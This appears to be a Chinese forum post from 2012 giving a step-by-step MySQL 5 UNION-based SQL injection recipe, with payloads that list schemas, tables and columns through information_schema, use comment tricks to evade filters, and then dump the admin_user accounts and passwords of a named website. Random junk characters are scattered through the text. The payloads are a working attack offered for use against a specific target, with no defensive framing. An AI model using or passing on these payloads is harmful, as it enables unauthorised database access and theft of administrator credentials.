查库; l; A ~, S. h: B
' G1 s w, L6 T1 T' q
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
" S6 w8 q/ _ p
" J, J0 v# S0 V- p7 i查表
4 Q' [6 M9 D) U- U
5 F0 P, K$ ~5 }id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
& W. S! U! Z5 N) }2 N. Z5 H) W7 y! A( T3 @
查段/ I! r0 B3 u% C7 f% s
' c) M: H) k3 @ G+ B- {
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1# N3 G( o9 H/ O& ]) }, ^
( W( D! L" s/ ]: m0 ^$ K s
1 f! g9 Z: G2 t2 \mysql5高级注入方法暴表1 P) K. \' h" N# w# }: \
. V3 ?; R, a, ^$ j/ z- ^
例子如下:
+ ~, S. ?$ D3 o1 {$ U+ _7 U) j5 v/ @4 D9 b- y8 l9 i
1.爆表. f% ^' ^1 g0 ]; l7 ^
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
+ @: ?& z3 ^ A1 V# @ D' B5 M这样爆到第4个时出现了admin_user表。
" X; X( e5 m7 L7 g" u$ D: V4 ^4 [+ Q3 P
2.暴字段2 W6 m8 K' ]% _$ e1 f4 c
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
) A7 f$ o9 `* C3 G; y( M5 y/ q/ l) V4 j. h! }
$ b. T: x8 q# W7 m" `( `
3.爆密码
+ `, X; k1 X, |$ jhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
5 I. e0 T( Q7 |9 E9 l& S. v7 c* X/ G: y4 H2 }1 {4 i
+ y- Y4 B+ d# Q4 S/ \# c
|
发表于 2012-9-13 16:29:37
收藏
支持
反对